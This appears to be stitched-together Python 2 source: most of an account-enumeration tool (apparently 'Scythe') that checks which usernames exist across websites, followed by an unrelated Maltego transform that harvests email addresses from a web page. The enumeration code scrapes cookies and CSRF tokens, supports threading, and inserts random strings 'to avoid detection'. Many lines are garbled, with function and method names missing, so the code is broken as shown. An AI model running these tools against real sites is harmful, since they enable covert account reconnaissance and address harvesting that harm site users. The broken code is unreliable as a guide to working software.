------------------------------------------------------------------------------" print['yellow'] + ">>>>>" + color['end'] + " Module Information " + \ color['yellow'] + "<<<<<" + color['end'], 100) print " ------------------------------------------------------------------------------" if opts.verbose and not opts.listmodules: for mod in modules: print textwrap.fill((" NAME: %s" % mod['name']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" URL: %s" % mod['url']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" METHOD: %s" % mod['method']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" HEADERS: %s" % mod['headers']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" POST PARAMETERS: %s" % mod['postParameters']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" REQUEST COOKIE: %s" % mod['requestCookie']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" REQUEST CSRF TOKEN: %s" % mod['requestCSRF']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" SUCCESS MATCH: %s" % mod['successmatch']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" NEGATIVE MATCH: %s" % mod['negativematch']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" ERROR MATCH: %s" % mod['errormatch']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" MODULE NOTE: %s" % mod['message']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" DATE: %s" % mod['date']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" VERSION: %s" % mod['version']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" AUTHOR: %s" % mod['author']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" CATEGORY: %s" % mod['category']), initial_indent='', subsequent_indent=' -> ', width=80) print " ------------------------------------------------------------------------------" else: print " ", "| Name |".ljust(35), "| Category |".ljust(26), "| Version |".ljust(8) print " ------------------------------------------------------------------------------" for mod in modules: print " " + mod['name'].ljust(37) + mod['category'].ljust(30) + mod['version'].ljust(10) print " ------------------------------------------------------------------------------\n" # exit after providing module list sys.exit(0) def output_accounts(): # print information about the accounts loaded from accountfile print "\n ------------------------------------------------------------------------------" print['yellow'] + ">>>>>" + color['end'] + " Accounts Loaded " + \ color['yellow'] + "<<<<<" + color['end'], 100) print " ------------------------------------------------------------------------------" for a in accounts: print textwrap.fill((" Account name: %s" % a), initial_indent='', subsequent_indent=' -> ', width=80) print " ------------------------------------------------------------------------------\n" def output_success(): # print information about success matches if opts.summary or (opts.verbose and opts.summary): print "\n ------------------------------------------------------------------------------" print['yellow'] + ">>>>>" + color['end'] + " Successful Matches " + \ color['yellow'] + "<<<<<" + color['end'], 100) print " ------------------------------------------------------------------------------" s_success = sorted(success, key=lambda k: k['name']) # group by site name # print normal summary table on request (--summary) if not opts.verbose and opts.summary: print "\n ------------------------------------------------------------------------------" print " ", "| Module |".ljust(35), " | Account |".ljust(28) print " ------------------------------------------------------------------------------" for s in s_success: print " " + s['name'].ljust(37) + s['account'].ljust(30) print " ------------------------------------------------------------------------------\n" # print verbose summary on request (-v --summary) elif opts.verbose and opts.summary: for s in s_success: print textwrap.fill((" NAME: \t\t\t%s" % s['name']), initial_indent='', subsequent_indent='\t -> ', width=80) print textwrap.fill((" ACCOUNT: \t\t%s" % s['account']), initial_indent='', subsequent_indent='\t -> ', width=80) print textwrap.fill((" URL: \t\t\t%s" % s['url']), initial_indent='', subsequent_indent='\t -> ', width=80) print textwrap.fill((" METHOD: \t\t%s" % s['method']), initial_indent='', subsequent_indent='\t -> ', width=80) print textwrap.fill((" POST PARAMETERS: \t%s" % s['postParameters']), initial_indent='', subsequent_indent='\t -> ', width=80) print " ------------------------------------------------------------------------------" else: print " ------------------------------------------------------------------------------\n" def load_modules(): # load the modules from moduledir # only XML files are permitted if not "all" in (cat.lower() for cat in opts.category): # using options from command line if opts.verbose: print " [" + color['yellow'] + "-" + color['end'] \ + "] using command line supplied category : %s" \ % ", ".join(opts.category) for (path, dirs, files) in os.walk(opts.moduledir): for d in dirs: if d.startswith("."): # ignore hidden . dirctories dirs.remove(d) print " [" + color['yellow'] + "-" + color['end'] \ +"] Starting to load modules from %s" % path for file in files: if not path.endswith('/'): path = path + '/' # read in modules if file.endswith('.xml') and not file.startswith('.'): if opts.verbose: print "\t[ ] Checking module : %s" % file try: module_dom = parse(path + file) module_dom = module_dom.getElementsByTagName('site') extract_module_data(file, module_dom) except: print "\t[" + color['red'] + "!" + color['end'] \ +"] Error parsing %s module, check XML" % file elif opts.debug: print "\t[" + color['red'] + "!" + color['end'] \ + "] Skipping non-XML file : %s" % file if opts.verbose or opts.listmodules: output_modules() #debug and module output def load_accounts(): # if account is passed in we use that, otherwise # load accounts from accountfile # one account per line if opts.account: # load account from command line if opts.verbose: print " [" + color['yellow'] + "-" + color['end'] \ + "] using command line supplied user(s) : %s" \ % ", ".join(opts.account) for a in opts.account: # add all command line accounts to array for testcases if a: # ignore empty fields accounts.append(a) else: # load accounts from file if it exists if not os.path.exists(opts.accountfile): print "\n [" + color['red'] + "!" + color['end'] \ + "] The supplied file (%s) does not exist!" \ % opts.accountfile sys.exit(0) account_file = open(opts.accountfile, 'r') account_read = account_file.readlines() account_read = [item.rstrip() for item in account_read] for a in account_read: if not a.startswith("#"): # ignore comment lines in accountfile accounts.append(a) if opts.verbose: output_accounts() # debug output def create_testcases(): # create a list of testcases from accounts and modules # # replace functions are in place to replace <ACCOUNT> # with the account names presented # the script will also replace any instances of <RANDOM> # with a random string (8) to avoid detection testcases = [] tempcase = {} for a in accounts: for m in modules: rand = ''.join( Random().sample(string.letters+string.digits, 8) ) # 8 random chars tempcase['url'] = m['url'].replace("<ACCOUNT>", a).replace("<RANDOM>", rand) tempcase['account'] = a tempcase['name'] = m['name'] tempcase['method'] = m['method'] tempcase['postParameters'] = m['postParameters'].replace("<ACCOUNT>", a).replace("<RANDOM>", rand) tempcase['headers'] = m['headers'] tempcase['requestCookie'] = m['requestCookie'] tempcase['requestCSRF'] = m['requestCSRF'] tempcase['csrf_url'] = m['csrf_url'] tempcase['csrf_regex'] = m['csrf_regex'] tempcase['successmatch'] = m['successmatch'] tempcase['negativematch'] = m['negativematch'] tempcase['errormatch'] = m['errormatch'] testcases.append(tempcase) tempcase = {} if testcases: return testcases else: print " [" + color['red'] + "!" + color['end'] + \ "] No testcases created, check your accounts and module settings" print sys.exit(0) def request_handler(testcases): # handle requests present in testcases print "\n ------------------------------------------------------------------------------" print['yellow'] + ">>>>>" + color['end'] + " Testcases " + \ color['yellow'] + "<<<<<" + color['end'], 100) print " ------------------------------------------------------------------------------" print " [" + color['yellow'] + "-" + color['end'] \ +"] Starting testcases (%d in total)" % len(testcases) if opts.wait: print " [" + color['yellow'] + "-" + color['end'] \ +"] Throttling in place (%.2f seconds)\n" % opts.wait elif opts.threads: print " [" + color['yellow'] + "-" + color['end'] \ +"] Threading in use (%d threads max)\n" % opts.threads else: print progress = 0 # initiate progress count if opts.threads > 1: threads = [] for test in testcases: # add testcases to queue queue.put(test) # create progress update lock progress_lock = Lock() while not queue.empty() and not sigint: # only allow a limited number of threads if opts.threads >= activeCount() and not sigint: # get next test from queue test = queue.get() try: # setup thread to perform test t = Thread(target=make_request, args=(test,)) t.daemon=True threads.append(t) t.start() finally: # iterate progress value for the progress bar progress = len(testcases) - queue.qsize() # call progressbar progress_lock.acquire() try: progressbar(progress, len(testcases)) finally: progress_lock.release() # mark task as done queue.task_done() # wait for queue and threads to end before continuing while activeCount() > 1: # keep main program active to catch keyboard interrupts time.sleep(0.1) for thread in threads: thread.join() # no more active threads. resolve queue queue.join() else: for test in testcases: # make request without using threading make_request(test) # iterate progress value for the progress bar progress = progress +1 # call progressbar progressbar(progress, len(testcases)) if opts.wait: # wait X seconds as per wait setting time.sleep(opts.wait) return def progressbar(progress, total): # progressbar if total > 50: # only show progress on tests of > 50 if not progress == 0: # set percentage progress_percentage = int(100 / (float(total) / float(progress))) # display progress at set points total = float(total) # calculate progress for 25, 50, 75, and 99% vals = [int(total/100*25), int(total/100*50), int(total/100*75), int(total-1)] if progress in vals: print " [" + color['yellow'] + "-" + color['end'] +"] [%s] %s%% complete\n" \ % ((color['yellow'] + ("#"*(progress_percentage / 10)) + \ color['end']).ljust(10, "."),progress_percentage), def make_request(test, retry=0, wait_time=False): # make request and add output to array # set threadname if not current_thread().name == 'MainThread': threadname = "[" + current_thread().name +"] >" else: # return blank string when not using threading threadname = '>' # GET method worker if test['method'] == 'GET': test, resp, r_info, req = get_request(test) # success match if resp and test['successmatch']: matched = success_check(resp, test['successmatch']) if matched: print " [" + color['green'] + "X" + color['end'] + "] Account %s exists on %s" \ % (test['account'], test['name']) success.append(test) if opts.debug: print # spacing forverbose output if opts.outputfile: # log to outputfile opts.outputfile.write("Account " + test['account'] + " exists on " \ + test['name'] +"\n") # error match if resp and test['errormatch']: error = error_check(resp, test['errormatch']) if error and retry >= opts.retries: print " [" + color['red'] + "!" + color['end'] + \ "] %s Retries exceeded when testing account %s on %s" \ % (threadname, test['account'], test['name']) elif error: print " [" + color['yellow'] + "!" + color['end'] + \ "] %s Error detected when testing account %s on %s" \ % (threadname, test['account'], test['name']) # wait X seconds and retry if wait_time: # double existing wait_time wait_time = wait_time * 2 else: # set starting point for wait_time wait_time = opts.retrytime if opts.verbose: print " [ ] %s Waiting %d seconds before retry" \ % (threadname, wait_time) time.sleep(wait_time) # increment retry counter retry = retry + 1 if opts.verbose: print " [ ] %s Attempting retry (%d of %d)" \ % (threadname, retry, opts.retries) make_request(test, retry, wait_time) return # negative match if resp and test['negativematch']: matched = negative_check(resp, test['negativematch']) if matched and opts.verbose: print " [" + color['red'] + "X" + color['end'] + "] Negative matched %s on %s" \ % (test['account'], test['name']) # advance debug output if resp and opts.debugoutput: debug_save_response(test, resp, r_info, req) return # POST method worker elif test['method'] == 'POST': test, resp, r_info, req = post_request(test) # success match if resp and test['successmatch']: matched = success_check(resp, test['successmatch']) if matched: print " [" + color['green'] + "X" + color['end'] + "] Account %s exists on %s" \ % (test['account'], test['name']) success.append(test) if opts.debug: print # spacing forverbose output if opts.outputfile: # log to outputfile opts.outputfile.write("Account " + test['account'] + " exists on " \ + test['name'] +"\n") # error match if resp and test['errormatch']: error = error_check(resp, test['errormatch']) if error and retry >= opts.retries: print " [" + color['red'] + "!" + color['end'] + \ "] %s Retries exceeded when testing account %s on %s" \ % (threadname, test['account'], test['name']) elif error: print " [" + color['yellow'] + "!" + color['end'] + \ "] %s Error detected when testing account %s on %s" \ % (threadname, test['account'], test['name']) # wait X seconds and retry if wait_time: # double existing wait_time wait_time = wait_time * 2 else: # set starting point for wait_time wait_time = opts.retrytime if opts.verbose: print " [ ] %s Waiting %d seconds before retry" \ % (threadname, wait_time) time.sleep(wait_time) # increment retry counter retry = retry + 1 if opts.verbose: print " [ ] %s Attempting retry (%d of %d)" \ % (threadname, retry, opts.retries) make_request(test, retry, wait_time) # negative match if resp and test['negativematch']: matched = negative_check(resp, test['negativematch']) if matched and opts.verbose: print " [" + color['red'] + "X" + color['end'] + "] Negative matched %s on %s" \ % (test['account'], test['name']) if resp and opts.debugoutput: debug_save_response(test, resp, r_info, req) return else: print " [" + color['red'] + "!" + color['end'] + "] Unknown Method %s : %s" \ % test['method'], test['url'] return def get_request(test): # perform GET request urllib.urlcleanup() # clear cache try: user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' req_headers = { 'User-Agent' : user_agent } for each in test['headers']: key, val = each.split(":", 1) key = key.lstrip() val = val.lstrip() req_headers[key] = val if test['requestCookie'] or test['requestCSRF']: # request cookie and csrf token if set in module XML cookie_val, csrf_val = request_value(test) if cookie_val: req_headers['cookie'] = cookie_val if csrf_val: # replace <CSRFTOKEN> with the collected token test['url'] = test['url'].replace("<CSRFTOKEN>", csrf_val) test['postParameters'] = test['postParameters'].replace("<CSRFTOKEN>", csrf_val) test['headers'] = [h.replace('<CSRFTOKEN>', csrf_val) for h in test['headers']] if opts.debug: # print debug output print textwrap.fill((" [ ] URL (GET): %s" % test['url']), initial_indent='', subsequent_indent=' -> ', width=80) print # assign NullHTTPErrorProcessor as default opener opener = urllib2.build_opener(NullHTTPErrorProcessor()) urllib2.install_opener(opener) req = urllib2.Request(test['url'], headers=req_headers) f = urllib2.urlopen(req) r_body = r_info = f.close() # handle instances where the response body is 0 bytes in length if not r_body: print " [" + color['red'] + "!" + color['end'] + "] Zero byte response received from %s" \ % test['name'] r_body = "<Scythe Message: Empty response from server>" # returned updated test and response data return test, r_body, r_info, req except Exception: print textwrap.fill((" [" + color['red'] + "!" + color['end'] + "] Error contacting %s" \ % test['url']), initial_indent='', subsequent_indent='\t', width=80) if opts.debug: for ex in traceback.format_exc().splitlines(): print textwrap.fill((" %s" \ % str(ex)), initial_indent='', subsequent_indent='\t', width=80) print return test, False, False, req def post_request(test): # perform POST request urllib.urlcleanup() # clear cache try: user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' req_headers = { 'User-Agent' : user_agent } if test['requestCookie'] or test['requestCSRF']: # request cookie and csrf token if set in module XML cookie_val, csrf_val = request_value(test) if cookie_val: req_headers['cookie'] = cookie_val if csrf_val: # replace <CSRFTOKEN> with the collected token test['url'] = test['url'].replace("<CSRFTOKEN>", csrf_val) test['postParameters'] = test['postParameters'].replace("<CSRFTOKEN>", csrf_val) test['headers'] = [h.replace('<CSRFTOKEN>', csrf_val) for h in test['headers']] if test['headers']: for each in test['headers']: key, val = each.split(":", 1) key = key.lstrip() val = val.lstrip() req_headers[key] = val if opts.debug: # print debug output print textwrap.fill((" [ ] URL (POST): %s" % test['url']), initial_indent='', subsequent_indent=' -> ', width=80) print textwrap.fill((" [ ] POST PARAMETERS: %s" % test['postParameters']), initial_indent='', subsequent_indent=' -> ', width=80) print # assign NullHTTPErrorProcessor as default opener opener = urllib2.build_opener(NullHTTPErrorProcessor()) urllib2.install_opener(opener) req = urllib2.Request(test['url'], test['postParameters'], req_headers) f = urllib2.urlopen(req) r_body = r_info = f.close() # handle instances where the response body is 0 bytes in length if not r_body: print " [" + color['red'] + "!" + color['end'] + "] Zero byte response received from %s" \ % test['name'] r_body = "<Scythe Message: Empty response from server>" # returned updated test and response data return test, r_body, r_info, req except Exception: print textwrap.fill((" [" + color['red'] + "!" + color['end'] + "] Error contacting %s" \ % test['url']), initial_indent='', subsequent_indent='\t', width=80) if opts.debug: for ex in traceback.format_exc().splitlines(): print textwrap.fill((" %s" \ % str(ex)), initial_indent='', subsequent_indent='\t', width=80) print return test, False, False, req def request_value(test): # request a cookie or CSRF token from the target site for use during the logon attempt urllib.urlcleanup() # clear cache # assign NullHTTPErrorProcessor as default opener opener = urllib2.build_opener(NullHTTPErrorProcessor()) urllib2.install_opener(opener) # capture cookie first for use with the CSRF token request # capture Set-Cookie if test['requestCookie']: user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' req_headers = { 'User-Agent' : user_agent } if test['csrf_url']: # if csrf_url is set, use the same page to collect cookies url = test['csrf_url'] else: url = test['url'].split("?", 1)[0] # strip parameters from url where present req_val = urllib2.Request(url, headers=req_headers) response = urllib2.urlopen(req_val) resp_body = if'Set-Cookie'): set_cookie ='Set-Cookie') # grab Set-cookie # work Set-cookie into valid cookies to set bcookie = BaseCookie(set_cookie) # strip off unneeded attributes (e.g. expires, path, HTTPOnly etc... cookie_val = bcookie.output(attrs=[], header="").lstrip() else: cookie_val = False print " [" + color['red'] + "!" + color['end'] \ + "] Set-Cookie Error: No valid Set-Cookie response received" else: cookie_val = False # capture CSRF token (using regex from module XML) if test['requestCSRF']: user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' req_headers = { 'User-Agent' : user_agent } if cookie_val: # if a cookie value exists, use the existing response if opts.debug: print " [" + color['yellow'] + "-" + color['end'] \ + "] Using existing response to gather CSRF token" else: # get new response to work with url = test['csrf_url'] req_val = urllib2.Request(url, headers=req_headers) response = urllib2.urlopen(req_val) try: csrf_regex = re.compile(test['csrf_regex']) match =, resp_body) if match: csrf_val = else: csrf_val = False print " [" + color['red'] + "!" + color['end'] \ + "] Invalid CSRF regex. Please check parameters" except: print " [" + color['red'] + "!" + color['end'] \ + "] Invalid CSRF regex. Please check parameters" if opts.debug: print "\n\t[" + color['red'] + "!" + color['end'] + "] ", traceback.print_exc() else: csrf_val = False return cookie_val, csrf_val def error_check(data, errormatch): # checks response data against errormatch regex try: regex = re.compile(errormatch) if return True else: return False except: print " [" + color['red'] + "!" + color['end'] \ + "] Invalid in error check. Please check parameter" if opts.debug: print "\n\t[" + color['red'] + "!" + color['end'] + "] ", traceback.print_exc() def success_check(data, successmatch): # checks response data against successmatch regex try: regex = re.compile(successmatch) if return True else: return False except: print " [" + color['red'] + "!" + color['end'] \ + "] Invalid in success check. Please check parameter" if opts.debug: print "\n\t[" + color['red'] + "!" + color['end'] + "] ", traceback.print_exc() def negative_check(data, negativematch): # checks response data against negativematch regex try: regex = re.compile(negativematch) if return True else: return False except: print " [" + color['red'] + "!" + color['end'] \ + "] Invalid in negative check. Please check parameter" if opts.debug: print "\n\t[" + color['red'] + "!" + color['end'] + "] ", traceback.print_exc() def debug_save_response(test, resp, r_info, req): # save advanced deug responses to ./debug/ # get time to attach to filename timenow = int(time.time()) # set testname, remove spaces testname = re.sub(r'[^\w]', '_', test['name']) + "_" # check debug directory exists, if not create it if not os.path.exists('./debug/'): os.makedirs('./debug/') # filename for html and headers, strip unusable chars from filenames htmlfile = testname + str(timenow) htmlfile = './debug/' + re.sub(r'[^\w]', '_', htmlfile) + '.html' # strip unsuitable chars hdrfile = testname + str(timenow) hdrfile = './debug/' + re.sub(r'[^\w]', '_', hdrfile) + '.headers' # strip unsuitable chars # format headers header_output = [] header_output.append('---------------------\nrequest headers\n---------------------\n') for key in req.headers: header_output.append(key + ': ' + req.headers[key]) header_output.append('\n---------------------\nresponse headers\n---------------------\n') for each in r_info.headers: header_output.append(each.rstrip()) header_output.append('\n') # check if file exists, if so add random number to filename if os.path.isfile(htmlfile): rand_addition = str(random.randint(0000, 9999)).zfill(4) htmlfile = htmlfile[:-5] + '_' + rand_addition + '.html' hdrfile = hdrfile[:-8] + '_' + rand_addition + '.headers' # open file for writing f_html = open(htmlfile, 'w') f_headers = open(hdrfile, 'w') # write response and close f_html.write(resp) f_html.close() # write headers and close f_headers.write("\n".join(header_output)) f_headers.close() print " [" + color['yellow'] + ">" + color['end'] + "] Saved debug output to %s[.html|.header]" % htmlfile[:-5] def signal_handler(signal, frame): # handle CTRL + C events # globally signal threads to end global sigint sigint = True # turn on SIGINT print if not len(success) == 0: if opts.summary or (opts.verbose and opts.summary): print " [" + color['red'] + "!" + color['end'] \ + "] Outputting successful findings and closing\n" output_success() print " [" + color['yellow'] + "-" + color['end'] \ +"] tests stopped after %.2f seconds" % (time.clock() - startTime) print "\n [" + color['red'] + "!" + color['end'] + "] Ctrl+C detected... exiting\n" if opts.outputfile and not isinstance(opts.outputfile, str): # if opts.outputfile is an open file, close it to save output opts.outputfile.close() os._exit(1) def query_user(question, default='no'): # query user for Y/N response valid = {"yes":True, "y":True, "no":False, "n":False} if default.lower() == 'yes': prompt = " [ " + color['yellow'] + "Y" + color['end'] + "/n ] :" else: prompt = " [ y/" + color['yellow'] + "N" + color['end'] + " ] :" while True: print question + prompt, try: choice = raw_input().lower() except: print "\n\n [" + color['red'] + "!" + color['end'] \ + "] Ctrl+C detected... exiting\n" sys.exit(0) if choice == '': if default.lower() == 'yes': return valid["yes"] else: return valid["no"] elif choice in valid: return valid[choice] else: print "\t[" + color['red'] + "!" + color['end'] \ + "] Please respond with 'yes' or 'no'\n" def setup(): # setup command line options global opts parser = OptionParser(version="%prog version ::: " + __version__, epilog="\n") # account options grouping group = OptionGroup(parser, "Account Options ") group.add_option( "-a", "--accountfile", dest="accountfile", default="./accountfile.txt", help="Location of the accounts FILE (1 per line)", metavar="FILE" ) group.add_option( "-u", "--account", dest="account", default=[], action="append", help="Account(s) to check (comma seperated, no spaces)", metavar="STRING" ) parser.add_option_group(group) # module options grouping group = OptionGroup(parser, "Module Options ") group.add_option( "-l", "--list", action="store_true", dest="listmodules", default=False, help="List module names and categories", ) group.add_option( "-m", "--moduledir", dest="moduledir", default="./modules/", help="Location of the modules directory", metavar="DIR" ) group.add_option( "-s", "--single", dest="single", default="", help="Restrict to specific module name (XML NAME or filename)", metavar="MODULE" ) group.add_option( "-c", "--category", dest="category", default=[], action="append", help="Restrict modules based on category (comma seperated, no spaces)" ) parser.add_option_group(group) # timing options grouping group = OptionGroup(parser, "Timing Options ") group.add_option( "-t", "--threads", dest="threads", default=0, help="Enable threading. Specify max # of threads", metavar="INT", type="int" ) group.add_option( "-w", "--wait", dest="wait", default=False, help="Throttle tests (e.g. -w 0.5 for 0.5 second delay)", type="float", metavar="SECS" ) group.add_option( "--retrytime", dest="retrytime", default="30", help="Wait and retry on errormatch (seconds)", type="int", metavar="SECS" ) group.add_option( "--retries", dest="retries", default="1", help="Number of retries, doubling wait time each retry", type="int" ) parser.add_option_group(group) # output options grouping group = OptionGroup(parser, "Output Options ") group.add_option( "--summary", action="store_true", dest="summary", default=False, help="Show detailed summary before closing", ) group.add_option( "-o", "--output", dest="outputfile", default=False, help="Output results to a file as well as screen", metavar="FILE" ) parser.add_option_group(group) # debug options grouping group = OptionGroup(parser, "Debug Options") group.add_option( "-v", "--verbose", action="count", dest="verbose", help="Print verbose messages to stdout (-vv for very verbose)" ) group.add_option( "-d", "--debug", action="store_true", dest="debugoutput", default=False, help="Store response and headers in ./debug/" ) group.add_option( "-?", action="store_true", dest="question", default=False, help=SUPPRESS_HELP ) # hidden -? handling parser.add_option_group(group) (opts, args) = parser.parse_args() # the following section reworks options as required # set retries to 1 if retrytime set and not set already if not opts.retrytime == 30 and \ opts.retries == 0: # user set retrytime but forgot to set retries to at least 1 opts.retries = 1 # split multiple account names into flat list if opts.account: acc_split = [] for a in opts.account: acc_split.append(a.split(',')) opts.account = sum(acc_split, []) # remove blanks and invalid entries from accounts opts.account = filter(None, opts.account) # split multiple categories into flat list if opts.category: cat_split = [] for c in opts.category: cat_split.append(c.split(',')) opts.category = sum(cat_split, []) else: # default to all categories opts.category = ['all'] # handle help output if opts.question: # print help on -? also parser.print_help() sys.exit(0) # set verbosity level (-v verbose, -v -v verbose and debug) if not opts.verbose: opts.verbose = False opts.debug = False elif opts.verbose == 1: opts.verbose = True opts.debug = False elif opts.verbose == 2: opts.verbose = True opts.debug = True elif opts.verbose == 3: opts.verbose = True opts.debug = True # enabled saving of header and response data to ./debug/ opts.debugoutput = True else: opts.verbose = True opts.debug = True # set ansi colors for supported platforms (colorama support for Windows) if sys.platform.startswith("win"): try: import colorama colorama.init() color['red'] = colorama.Fore.RED + colorama.Style.BRIGHT color['green'] = colorama.Fore.GREEN + colorama.Style.BRIGHT color['yellow'] = colorama.Fore.YELLOW + colorama.Style.BRIGHT color['end'] = colorama.Fore.RESET + colorama.Style.RESET_ALL except: # disable colors on systems without colorama installed print "\n\t[!] Colorama Python module not found, color support disabled" color['red'] = "" color['green'] = "" color['yellow'] = "" color['end'] = "" else: # set colors for non-Windows systems color['red'] = "\033[1;31m" color['green'] = "\033[1;32m" color['yellow'] = "\033[1;33m" color['end'] = "\033[0m" # error on wait AND threads if opts.wait and opts.threads > 0: parser.print_help() parser.exit(0, "\n\t[" + color['red'] + "!" + color['end'] \ +"] Please don't set throttling (wait) AND threading!\n") # clear category if single module specified if opts.single: opts.category = "single" # clear accountfile if account specified at command line if opts.account: opts.accountfile = "none" # display selected options for the user display_options() # default user_input for cases where none is required user_input = "none" # attempt to handle situations where no module or account file is specified # skip section if module output is selected if (opts.moduledir == './modules/' and opts.accountfile == './accountfile.txt') \ and not opts.listmodules and not opts.account and \ "all" in (cat.lower() for cat in opts.category): # accountdir and moduledir are default single/specific account mode not enabled print "\t[ ] No command-line options specified" # prompt user as this could be dangerous user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \ +"] Test accounts in accountfile.txt against ALL modules? (dangerous)", 'no') # vary prompts cased on selected options # case: account(s) specified but modules not set elif opts.account and opts.moduledir == './modules/' and \ not opts.single and "all" in (cat.lower() for cat in opts.category): user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \ +"] Test provided account(s) against ALL modules?", 'yes') # case: module set but accountfile left at default elif opts.single and opts.accountfile == './accountfile.txt': user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \ +"] Test usernames in accountfile.txt against the selected module?", 'yes') # case: category set but accountfile left at default elif opts.category and opts.accountfile == './accountfile.txt' \ and not opts.listmodules: user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \ +"] Test accounts in accountfile.txt against selected category?", 'yes') # handle user_input if user_input: # continue using defaults if not user_input == "none": print "\t[ ] Continuing...." else: print parser.print_help() parser.exit(0, "\t[" + color['red'] + "!" + color['end'] \ +"] Please specify arguments\n") # check if outputfile exists already and prompt to overwrite if opts.outputfile: if os.path.exists(opts.outputfile): # query user to overwrite existing outputfile user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \ +"] Overwrite existing outputfile?", 'no') if user_input: print "\t[ ] Overwriting output file : %s\n" % opts.outputfile else: sys.exit("\n\t[" + color['red'] + "!" + color['end'] \ +"] Please specify new output file\n") # open output file try: opts.outputfile = open(opts.outputfile, "w") except: print " [" + color['red'] + "!" + color['end'] \ + "] Unable to open output file for writing" if opts.debug: print "\n\t[" + color['red'] + "!" + color['end'] + "] ", traceback.print_exc() def display_options(): # print out the options being used print "\n ------------------------------------------------------------------------------" # display accountfile if accounts not specified at commandline if not opts.account: print "\t[" + color['yellow'] + "-" + color['end'] +"] Account File :::".ljust(30), \ str(opts.accountfile).ljust(40) else: print "\t[" + color['yellow'] + "-" + color['end'] +"] Account(s) :::".ljust(30), \ ", ".join(opts.account).ljust(40) # print module directory print "\t[" + color['yellow'] + "-" + color['end'] +"] Module Directory :::".ljust(30), \ str(opts.moduledir).ljust(40) # print categories if not single if not opts.single: print "\t[" + color['yellow'] + "-" + color['end'] +"] Categories :::".ljust(30), \ ", ".join(opts.category).ljust(40) else: print "\t[" + color['yellow'] + "-" + color['end'] +"] Single Module :::".ljust(30), \ str(opts.single).ljust(40) # display debug level if opts.debugoutput: print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \ "Debug output to ./debug/".ljust(40) elif opts.debug: print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \ "Very Verbose".ljust(40) else: print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \ "Verbose".ljust(40) # create outputfile and display filename if opts.outputfile: # get filename based on current path file = os.path.realpath(opts.outputfile).replace(os.getcwd(), "") if file.startswith("\\") or file.startswith("/"): # strip leading \ from file display file = file[1:] print "\t[" + color['yellow'] + "-" + color['end'] +"] Output :::".ljust(30), \ str(file).ljust(40) # display wait, threads and retries if specified if opts.wait: print "\t[" + color['yellow'] + "-" + color['end'] +"] Throttling :::".ljust(30), \ str(opts.wait) + " seconds".ljust(40) if opts.threads: print "\t[" + color['yellow'] + "-" + color['end'] +"] Threads :::".ljust(30), \ str(opts.threads) + " threads".ljust(40) if opts.retries: print "\t[" + color['yellow'] + "-" + color['end'] +"] Retries (delay) :::".ljust(30), \ str(opts.retries) + " (" + str(opts.retrytime) + " secs)".ljust(40) print " ------------------------------------------------------------------------------\n" class NullHTTPErrorProcessor(urllib2.HTTPErrorProcessor): # return contents without throwing errors (not everything in life is a 200 OK) def http_response(self, request, response): return response def https_response(self, request, response): return response def main(): logo() setup() load_modules() load_accounts() testcases = create_testcases() request_handler(testcases) # print success matches at the end print "\n [" + color['yellow'] + "-" + color['end'] \ +"] tests completed in %.2f seconds" \ % (time.clock() - startTime) if len(success) > 0: print " [" + color['yellow'] + "+" + color['end'] \ +"] %d matches found" \ % len(success) output_success() else: sys.exit("\n\t[" + color['red'] + "!" + color['end'] \ + "] No matches found. Exiting!") signal.signal(signal.SIGINT, signal_handler) main()
import urllib2 import re import sys tarurl = sys.argv[1] url = urllib2.urlopen(tarurl).read() regex = re.compile(("([a-z0-9!#$%&'*+\/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+\/=?^_`" "{|}~-]+)*(@|\sat\s)(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(\.|" "\sdot\s))+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)")) print"<MaltegoMessage>" print"<MaltegoTransformResponseMessage>" print" <Entities>" emails = re.findall(regex, url) for email in emails: print" <Entity Type=\"maltego.EmailAddress\">" print" <Value>"+str(email[0])+"</Value>" print" </Entity>" print" </Entities>" print"</MaltegoTransformResponseMessage>" print"</MaltegoMessage>"
